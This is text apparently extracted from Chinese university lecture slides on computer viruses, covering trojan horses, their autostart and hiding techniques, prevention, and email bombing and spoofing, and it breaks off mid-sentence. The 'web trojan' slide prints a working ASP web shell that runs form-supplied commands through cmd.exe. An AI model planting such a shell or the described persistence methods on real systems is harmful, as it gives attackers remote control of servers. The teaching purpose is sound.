计算机病毒—破坏性程序分析.ppt

计算机病毒Computer Virus;第七章 破坏性程序分析 ;7.1 特洛伊木马 ;7.1 特洛伊木马;木马的功能 ;7.1.2 木马的基本原理 ;; 木马的自启动 ;木马的自启动;木马的自启动;木马的自启动;(5) 启动菜单。在c:\windows\startmenu\programs\启动组下添加。 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders Startup=C:\windows\start menu\programs\startup。 ……;(6) 捆绑文件。 实现这种触发条件首先要控制端和服务端已通过木马建立连接，然后控制端用户用工具软件将木马文件和某一应用程序捆绑在一起，然后上传到服务端覆盖原文件，这样即使木马被删除了，只要运行捆绑了木马的应用程序，木马又会被安装上去了。 ;(7) 在Autoexec.bat和Config.sys中加载运行 但这种加载方式一般都需要控制端用户与服务端建立连接后，将已添加木马启动命令的同名文件上传到服务端覆盖这两个文件才行，而且采用这种方式不是很隐蔽，所以这种方法并不多见，但也不能因此而掉以轻心。 (8) 在Winstart.bat中启动  Winstart.bat是一个特殊性丝毫不亚于Autoexec.bat的批处理文件，也是一个能自动被Windows加载运行的文件。它多数情况下为应用程序及Windows自动生成，在执行了W并加载了多数驱动程序之后开始执行（这一点可通过启动时按F8键再选择逐步跟踪启动过程的启动方式可得知）。 ;木马的自启动;(11).通过浏览网页启动 　　通过此种途径有两种方法： 　　利用MIME漏洞： MIME被称为多用途Internet邮件扩展（Multipurpose Internet Mail Extensions），是一种技术规范，原用于电子邮件，现在也可以用于浏览器。MIME对邮件系统的扩展是巨大的，在它出现前，邮件内容如果包含声音和动画，就必须把它变为ASCII码或把二进制的信息变成可以传送的编码标准，而接收方必须经过解码才可以获得声音和图画信息。 ;木马的隐藏性 ;木马的预防 ;（1）、关端口 ICMP是IP协议的附属协议; （2）、隐藏进程:远程线程技术 （3）、争夺系统控制权:提升权限 （4）、穿透防火墙 (5)、隧道技术：HTTP隧道 ;木马技术的发展;;木马的示例—冰河;木马的示例—冰河;网页木马;% On Error Resume Next% %Set oScript = Server.CreateObject(WSCRIPT.SHELL)% %Set oFileSys = Server.CreateObject(Scripting.FileSystemObject)% %cmd = Request.Form(.CMD)% %If (cmd ) Then% %szTempFile = C:\\ oFileSys.GetTempName( )% %Call oScript.Run (cmd.exe /c cmd szTempFile, 0, True)% %Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)% %End If % FORM action=%= Request.ServerVariables(URL) % method=POST input type=text name=.CMD size=45 value=%= cmd % input type=submit value=Execute class=input/FORM PRE%If (IsObject(oFile)) Then% %On Error Resume Next% %Response.Write Server.HTMLEncode(oFile.ReadAll)% %oFile.Close% %Call oFileSys.DeleteFile(szTempFile, True)% %End If%/PRE ;7.2 邮件炸弹 ;电子邮件攻击主要有两种方式：一是电子邮件轰炸和电子邮件“滚雪球”，也就是通常所说的邮件炸弹，指的是用伪造的IP地址和电子邮件地址向同一信箱发送数以千计、万计甚至无穷多次的内容相同的垃圾邮件，致使受害人邮箱被“炸”，严重者可能会给电子邮件服务器操作系统带来危险???甚至瘫痪；二是电子邮件欺骗，攻击者佯称自己为系统管理员（邮件地址和系统管理员完全相同），给用户发送邮件要求用户修改口令（口令